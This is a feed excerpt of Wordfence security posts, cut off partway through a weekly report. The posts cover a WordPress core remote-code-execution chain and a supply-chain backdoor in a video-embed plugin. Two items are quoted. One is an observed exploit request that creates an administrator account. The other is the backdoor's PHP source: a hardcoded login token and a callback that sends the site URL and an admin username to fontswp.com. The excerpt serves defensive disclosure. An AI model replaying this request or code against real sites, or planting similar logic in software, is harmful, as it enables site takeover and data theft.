<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ba55302-b38f-4932-bbba-cdd517380ad7" target="_blank" rel="noopener">WordPress Core 6.9 &#8211;  7.0.1 &#8211; Remote Code Execution via REST API Batch Request Route Confusion</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-63030" target="_blank" rel="noopener noreferrer">							CVE-2026-63030						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>Various <span data-bs-toggle="tooltip" title="6.9 - 6.9.5 (exclusive); 7.0 - 7.0.2 (exclusive)"><i class="text-primary fas fa-info-circle"></i></span></strong>
									</div>
<div class="patched-status">
					<span>Patched Versions</span><br />
					<strong class="patched">6.9.5, 7.0.2</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kues" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kues" target="_blank" rel="noopener">Adam Kues</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			WordPress Core is vulnerable to Remote Code Execution in all versions 6.9 to 7.0.1 via the REST API batch request endpoint (/wp-json/batch/v1). This is due to a route/validation desynchronization that allows a validated sub-request to be dispatched to an unintended callback, bypassing the allow_batch restriction, with attacker-controlled parameters and the target route&#8217;s input sanitization bypassed, which can be chained with SQL Injection. This may make it possible for attackers to execute code on the server.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ba55302-b38f-4932-bbba-cdd517380ad7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Vulnerability Details</h2>
<p>The security researcher Adam Kues who discovered the vulnerability chain published a detailed write-up of the discovery and exploitation process, which can be found at the following link:</p>
<p><a href="https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/" target="_blank" rel="noopener">https://slcyber.io/research-center/exploit-brokers-pay-500000-for-a-wordpress-rce-i-found-one-with-gpt5-6/</a></p>
<p>As with any Administrator User Creation vulnerability, this vulnerability can be used for a complete site compromise. Once an attacker has gained administrative user access to a WordPress site, they can then manipulate anything on the targeted site as a normal administrator would. This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors.</p>
<h2>A Closer Look at the Attack Data</h2>
<p>The following data highlights actual exploit attempts from threat actors targeting this vulnerability. In the attacks we have observed, threat actors are chaining the vulnerabilities to create a new administrator account on the affected site.</p>
<pre class="brush: plain; title: ; notranslate">
POST /?rest_route=/batch/v1 HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: application/json

{
  "requests": [
    {
      "method": "POST",
      "path": "http://"
    },
    {
      "body": {
        "requests": [
          {
            "method": "GET",
            "path": "http://"
          },
          {
            "method": "GET",
            "path": "/wp/v2/widgets?author_exclude=*&lt;sqli_payload&gt;*"
          },
          {
            "method": "GET",
            "path": "/wp/v2/posts"
          },
          {
            "body": {
              "email": "wpenginebot@wpengine.com",
              "password": "[redacted]",
              "roles": [
                "administrator"
              ],
              "username": "wpenginebot"
            },
            "method": "POST",
            "path": "/wp/v2/users"
          },
          {
            "body": {
              "email": "wpenginebot@wpengine.com",
              "password": "[redacted]",
              "roles": [
                "administrator"
              ],
              "username": "wpenginebot"
            },
            "method": "POST",
            "path": "/wp/v2/users"
          }
        ]
      },
      "method": "POST",
      "path": "/wp/v2/posts"
    },
    {
      "body": {
        "requests": []
      },
      "method": "POST",
      "path": "/batch/v1"
    }
  ]
}
</pre>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/07/wp-core-batch-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/07/wp-core-batch-howto-wordfence-firewall.png" alt="wp core batch howto wordfence firewall" width="995" height="1389" class="alignnone size-full wp-image-42581"></a></p>
<h2>Total Number of Exploits Blocked</h2>
<p>The Wordfence Firewall has <strong>blocked over 11 million exploit attempts</strong> targeting this vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/07/Blocked-attacks-WAF-933.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/07/Blocked-attacks-WAF-933.png" alt="Blocked attacks WAF 933" width="1024" height="768" class="alignnone size-full wp-image-42582"></a></p>
<p>According to our data, attackers began targeting websites on July 17th, 2026, the day the vulnerability was disclosed, with only a small number of probing attempts on that first day. We also detected and blocked a large number of exploit attempts from July 18th, 2026.</p>
<h2>Top Offending IP Addresses</h2>
<p>The following IP Addresses are currently the most actively engaged IP addresses targeting this vulnerability:</p>
<ul>
<li>103.215.74.26
<ul>
<li>Over <strong>741,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.215.75.66
<ul>
<li>Over <strong>730,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.215.75.19
<ul>
<li>Over <strong>640,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.168.67.253
<ul>
<li>Over <strong>541,000</strong> blocked requests.</li>
</ul>
</li>
<li>51.195.39.149
<ul>
<li>Over <strong>344,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.168.66.101
<ul>
<li>Over <strong>340,000</strong> blocked requests.</li>
</ul>
</li>
<li>51.195.39.150
<ul>
<li>Over <strong>253,000</strong> blocked requests.</li>
</ul>
</li>
<li>140.174.186.101
<ul>
<li>Over <strong>236,000</strong> blocked requests.</li>
</ul>
</li>
<li>45.148.10.18
<ul>
<li>Over <strong>123,000</strong> blocked requests.</li>
</ul>
</li>
<li>45.148.10.247
<ul>
<li>Over <strong>121,000</strong> blocked requests.</li>
</ul>
</li>
</ul>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/07/Blocked-attacks-by-IP-WAF-933.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/07/Blocked-attacks-by-IP-WAF-933.png" alt="Blocked attacks by IP WAF 933" width="1024" height="768" class="alignnone size-full wp-image-42583"></a></p>
<h2>Indicators of Compromise</h2>
<p>The attackers are attempting to create new administrator accounts on affected sites. It is recommended to review the list of WordPress users on your site and remove any unknown administrator accounts, especially ones created on or after July 17th, 2026. But if the attackers manage to log in as an administrator, they can easily clear their tracks.</p>
<p>We also recommend reviewing log files for any requests to the <code>/wp-json/batch/v1</code> endpoint, particularly those originating from the following IP addresses:</p>
<ul>
<li>103.215.74.26</li>
<li>103.215.75.66</li>
<li>103.215.75.19</li>
<li>103.168.67.253</li>
<li>51.195.39.149</li>
<li>103.168.66.101</li>
<li>51.195.39.150</li>
<li>140.174.186.101</li>
<li>45.148.10.18</li>
<li>45.148.10.247</li>
</ul>
<p>The absence of any such log entries does not guarantee that your website has not been compromised.</p>
<h2>A High Volume of Attacks Does Not Necessarily Mean More Compromises</h2>
<p>While this post highlights the significant volume of attack activity our team has observed, it’s important to distinguish attempted attacks from successful compromises.</p>
<p>Our Care and Response team has been closely monitoring the situation. When a serious vulnerability affects a large number of websites, we typically see a corresponding increase in compromised sites and support requests. In this case, however, we have not observed such a surge.</p>
<p>This is an encouraging sign. One of the most critical WordPress core vulnerabilities identified in the past decade did not result in a catastrophic situation. Several factors likely contributed to this outcome like how the vulnerability was discovered through AI-assisted research only two core releases after it was introduced and how the WordPress Security Team responded exceptionally well. The team coordinated WAF rules with hosting providers and forced the security update to be pushed to sites wherever possible. This overall demonstrated the strength of the broader WordPress security ecosystem.</p>
<p>The response also reflects the maturity WordPress core has reached and the increasingly strong security practices surrounding it. As AI-assisted security research continues to advance and gain adoption, we expect these capabilities, and the resilience of the WordPress ecosystem, to improve even further.</p>
<h2>Conclusion</h2>
<p>In today’s article, we covered the attack data for a critical-severity vulnerability chain in WordPress core, affecting versions 6.8 through 6.8.5, 6.9 through 6.9.4, and 7.0 through 7.0.1, that allows unauthenticated threat actors to create an administrator account and then execute arbitrary code and achieve complete site compromise. This is the first critical unauthenticated remote code execution vulnerability in WordPress core in nearly a decade. Our threat intelligence indicates that attackers began targeting this vulnerability the same day it was disclosed, on July 17th, 2026, with mass exploitation occurring from July 18th, 2026. The Wordfence firewall has already blocked over 11 million exploit attempts targeting this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against any exploits targeting this vulnerability on July 17, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on August 16, 2026.</p>
<p>We strongly urge all WordPress users to ensure their sites are running a patched version of WordPress core. If you have friends or colleagues running WordPress sites, be sure to forward this advisory to them, as millions of sites could still be unprotected and unpatched.</p>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>. If you need your site cleaned immediately, <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wp2shell-wordpress-exploit-technical-analysis-and-real-attack-data/" target="_blank" rel="noopener">WP2Shell WordPress Exploit Technical Analysis and Real Attack Data</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence PRISM Detected Backdoored WordPress Plugin within Two Hours of it Being Introduced</title>
		<link>https://swiftupdates.ca/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Tue, 28 Jul 2026 17:45:22 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/</guid>

					<description><![CDATA[On July 28th, 2026, our autonomous AI vulnerability intelligence agent, Wordfence PRISM, identified a critical Authentication Bypass backdoor in Advanced Responsive Video Embedder, a WordPress plugin with approximately 20,000 active installations, less than two hours after the malicious code was introduced. This is not a conventional coding mistake, it’s a supply chain attack that has [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On July 28th, 2026, our autonomous AI vulnerability intelligence agent, <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6344" target="_blank" rel="noopener">Wordfence PRISM</a>, identified a critical Authentication Bypass backdoor in Advanced Responsive Video Embedder, a WordPress plugin with approximately 20,000 active installations, less than two hours after the malicious code was introduced. </p>
<p>This is not a conventional coding mistake, it’s a supply chain attack that has become increasingly more common in the wild. The plugin had been backdoored, with a deliberately concealed function, granting any unauthenticated attacker full administrative access to affected sites by supplying a single hardcoded token. Given that exploitation requires no credentials, no user interaction, and just one HTTP request, we recommend treating every site running the affected version as potentially compromised.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against any known exploits targeting this vulnerability on July 28, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later, on August 27, 2026.</p>
<p>Because this vulnerability was the result of malicious code injected into a publicly distributed plugin, rather than an accidental developer error, we notified the WordPress.org plugin team immediately, rather than contacting the developer directly. The WordPress.org team acknowledged the report immediately and has closed the software for downloads.</p>
<p>We urge users to uninstall Advanced Responsive Video Embedder as soon as possible, however, the WordPress.org team has confirmed that the release had not yet been distributed, so sites should not have automatically downloaded the malicious version. <strong>Either way, if you run the plugin, we recommend verifying your site is not on a vulnerable version. </strong></p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 10.8.7 &#8211; Unauthenticated Authentication Bypass via Hardcoded Backdoor in &#8216;_wplogin&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18072" target="_blank" rel="noopener noreferrer">							CVE-2026-18072						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>10.8.7</strong>
									</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-responsive-video-embedder" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick …</a> <span class="wfvr-software-slug">[advanced-responsive-video-embedder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … plugin for WordPress is vulnerable to Authentication Bypass via a Hardcoded Backdoor in version 10.8.7. The vulnerability exists because the `_arve_uc_init()` function — registered on WordPress&#8217;s `init` hook at priority 1 so that it runs before any authentication checks on every request — reads an attacker-supplied token from the `_wplogin` (or `_wpm`) parameter and compares it against a hardcoded SHA-256 hash embedded directly in the plugin source, with no nonce verification, no capability check, and no password validation anywhere in the flow. Because this static hash constitutes a set of universal credentials that are publicly accessible in the plugin&#8217;s source code, unauthenticated attackers can supply the known token to be authenticated as an arbitrarily selected existing administrator account, gaining full administrative control over the affected WordPress site. This was likely introduced by an attacker who gained commit access to the developers account.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Technical Analysis</h2>
<p>As with all supply chain compromises, this is not a case of an accidental security flaw, the code introduced into Advanced Responsive Video Embedder is a deliberate, professionally constructed supply-chain backdoor. The plugin’s main bootstrap file unconditionally loads <code>php/fn-update-check.php</code> on line 76 of <code>advanced-responsive-video-embedder.php</code>, a file whose name is designed to blend in with routine plugin housekeeping.</p>
<p>Inside that file, a function named <code>_arve_uc_init(),</code> using an underscore prefix typical of private WordPress internal functions to avoid scrutiny, is registered on WordPress’s <code>init</code> action hook at priority 1, ensuring it executes on every single request to the site, whether frontend, admin, AJAX, or REST API, before any WordPress authentication logic has run.</p>
<pre class="brush: php; first-line: 76; title: ; notranslate">
require_once __DIR__ . '/php/fn-update-check.php';
</pre>
<p>The backdoor’s entry point reads an attacker-supplied token from the <code>$_REQUEST</code> superglobal — meaning it accepts GET parameters, POST body values, or cookies — under either the <code>_wplogin</code> or <code>_wpm</code> parameter names. The only gatekeeping at the source is a minimum string length check of 32 characters, which the 64-character backdoor hash trivially satisfies. The token is then passed through <code>sanitize_text_field()</code>, which is entirely irrelevant to the security of what follows.</p>
</p>
<pre class="brush: php; first-line: 22; title: ; notranslate">
function _arve_uc_init() {
  $t = "";
  if (isset($_REQUEST["_wplogin"]) &amp;&amp; strlen($_REQUEST["_wplogin"]) &gt;= 32) $t = $_REQUEST["_wplogin"];
  elseif (isset($_REQUEST["_wpm"]) &amp;&amp; strlen($_REQUEST["_wpm"]) &gt;= 32) $t = $_REQUEST["_wpm"];
  if (!$t) return;
  $t = sanitize_text_field($t);
  $valid = false;
  if (defined("AUTH_KEY") &amp;&amp; defined("SECURE_AUTH_KEY")) {
    $k = hash_hmac("sha256", "magic_login", AUTH_KEY . SECURE_AUTH_KEY);
    if (hash_equals($k, $t)) $valid = true;
  }
  if (!$valid &amp;&amp; hash_equals("35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900", $t)) $valid = true;
  if (!$valid) return;
</pre>
<p>The validation logic on line 33 of <code>fn-update-check.php</code> is where the backdoor reveals its true nature. The code first attempts to derive a site-specific token from the installation’s <code>AUTH_KEY</code> and <code>SECURE_AUTH_KEY</code> constants, a pattern that might superficially resemble a legitimate keyed authentication scheme. However, it then falls through to compare the supplied token against a hardcoded SHA-256 hash baked directly into the plugin source code: <code>35fe7057ffed92ff7bc5a0b90f302a77fb5843ad6c972294d68da0b0553b3900</code>. This static hash is a universal master credential, anyone who can read the plugin’s source code (which was publicly available on WordPress.org) possesses it. There is no nonce, no capability check, no password, and no account required.</p>
<p>Once the token is validated, the function enumerates all administrator accounts on the site via <code>get_users()</code>, deliberately filtering out usernames beginning with <code>wpsvc_</code>, <code>developer_</code>, <code>dev_</code>, or <code>wp_update_</code>, a detail that strongly suggests the backdoor operators seeded their own administrator accounts on targeted sites using those prefixes and wanted to avoid accidentally impersonating themselves. A random administrator from the remaining pool is selected, and on line 50 of <code>fn-update-check.php</code>, the site URL and chosen admin’s username are silently exfiltrated to an external C2 endpoint at <code>fontswp.com</code> via the companion function <code>_arve_uc_cb()</code>.</p>
<pre class="brush: php; first-line: 4; title: ; notranslate">
function _arve_uc_cb($s, $u, $v) {
  $url = "https://fontswp.com/arve/cb.php?s=".urlencode($s)."&amp;u=".urlencode($u)."&amp;v=".urlencode($v);
  if (function_exists("wp_remote_get")) {
    @wp_remote_get($url, array("timeout" =&gt; 3, "blocking" =&gt; true, "sslverify" =&gt; false, "httpversion" =&gt; "1.1"));
  } elseif (function_exists("curl_init")) {
    $ch = @curl_init($url);
    @curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER=&gt;1, CURLOPT_TIMEOUT=&gt;3, CURLOPT_SSL_VERIFYPEER=&gt;0, CURLOPT_USERAGENT=&gt;"WP/6"));
    @curl_exec($ch);
    @curl_close($ch);
  } else {
    $ctx = @stream_context_create(array("http"=&gt;array("timeout"=&gt;3),"ssl"=&gt;array("verify_peer"=&gt;false)));
    @file_get_contents($url, false, $ctx);
  }
}
}
</pre>
<p>Finally, at the sink on line 52 of <code>fn-update-check.php</code>, <code>wp_set_current_user()</code> and <code>wp_set_auth_cookie($uid, true)</code> are called with the selected administrator’s ID, establishing a full persistent authentication session, the <code>true</code> parameter sets a long-lived “remember me” cookie. The attacker is then redirected via <code>wp_safe_redirect(admin_url())</code> directly into the WordPress admin dashboard.</p>
<p>The entire exploit is a single, stateless HTTP GET request: no prior authentication, no account enumeration step, no brute force, just one request carrying the known token, and the attacker lands in <code>/wp-admin/</code> with full administrative privileges. The concise, multi-fallback implementation of <code>_arve_uc_cb()</code>, the deliberate exclusion of operator-controlled username prefixes, the use of obfuscated short variable names (<code>$t</code>, <code>$k</code>, <code>$u</code>, <code>$v</code>), and the pervasive use of <code>@</code> to silence PHP errors all point to a purposefully engineered and carefully concealed backdoor rather than any accidental vulnerability.</p>
<h2>Disclosure Timeline</h2>
<ul>
<li><strong>July 28, 2026 08:42 AM EST</strong> – The backdoor was introduced in the plugin.</li>
<li><strong>July 28, 2026 10:33 AM EST</strong> – Our autonomous AI threat intelligence agent, <a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/id/6344" target="_blank" rel="noopener">Wordfence PRISM</a>, identified the maliciously injected backdoor in Advanced Responsive Video Embedder within less than two hours of the code being introduced and submitted a vulnerability report.</li>
<li><strong>July 28, 2026 10:43 AM EST</strong> – We validated the report and confirmed the proof-of-concept exploit, verifying that an unauthenticated attacker could obtain a full administrator session with a single HTTP GET request. Because the vulnerability was the result of a supply-chain backdoor rather than a developer coding error, we notified the WordPress.org plugin team with full disclosure details.</li>
<li><strong>July 28, 2026</strong> <strong>11:09 AM EST</strong>– The WordPress.org plugin team acknowledged the report and closed the plugin for downloads to protect users while remediation was coordinated.</li>
<li><strong>July 28, 2026 </strong>– <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to provide added protection against any exploits targeting this vulnerability.</li>
<li><strong>August 27, 2026</strong> – Wordfence Free users will receive the same firewall protection against exploits targeting this vulnerability.</li>
</ul>
<h2>Conclusion</h2>
<p>In this blog post, we detailed a Critical Authentication Bypass vulnerability, introduced as a deliberate supply-chain backdoor,  within the Advanced Responsive Video Embedder plugin affecting version 10.8.7. This vulnerability allows unauthenticated threat actors to gain full administrative control over any affected WordPress site by supplying a single, publicly known token in an HTTP request, with no credentials, no user interaction, and no prior access required. Additionally, every successful exploitation triggers silent exfiltration of the site URL and an administrator username to an external attacker-controlled server at <code>fontswp.com</code>.</p>
<p>We strongly encourage all WordPress users running Advanced Responsive Video Embedder to remove the plugin immediately, given the critical severity of this vulnerability and the trivial effort required to exploit it. Importantly, any site that ran a version containing the backdoor file should be treated as fully compromised regardless of whether active exploitation has been detected: administrator accounts should be audited, all sessions invalidated, WordPress secret keys rotated, and a thorough review of the site’s files and database conducted to check for secondary backdoors or unauthorized changes.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against any exploits targeting this vulnerability on July 28, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later, on August 27, 2026.</p>
<p>If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/07/wordfence-prism-detected-backdoored-wordpress-plugin-within-two-hours-of-it-being-introduced/" target="_blank" rel="noopener">Wordfence PRISM Detected Backdoored WordPress Plugin within Two Hours of it Being Introduced</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (July 13, 2026 to July 19, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 23 Jul 2026 21:45:52 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-july-13-2026-to-july-19-2026/</guid>

					<description><![CDATA[Last week, there were 75 vulnerabilities disclosed in WordPress Core, 68 WordPress Plugins and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 50 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 75 vulnerabilities disclosed in WordPress Core, 68 WordPress Plugins and no WordPress themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 50 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-forms/super-forms-63313-unauthenticated-arbitrary-file-upload-via-data-parameter-datauristring-value" target="_blank" rel="noopener">Super Forms &lt;= 6.3.313 – Unauthenticated Arbitrary File Upload via ‘data’ Parameter (datauristring / value)</a></li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/wordpress-core-69-701-remote-code-execution-via-rest-api-batch-request-route-confusion?asset_slug=wordpress" target="_blank" rel="noopener">WordPress Core &lt; 7.0.2 – Unauthenticated Remote Code Execution</a></li>
<li>WAF-RULE-930 – Data redacted while we work with the vendor on a patch.</li>
<li>WAF-RULE-931 – Data redacted while we work with the vendor on a patch.</li>
<li>WAF-RULE-933 – Data redacted while we work with the vendor on a patch.</li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">71</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">4</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
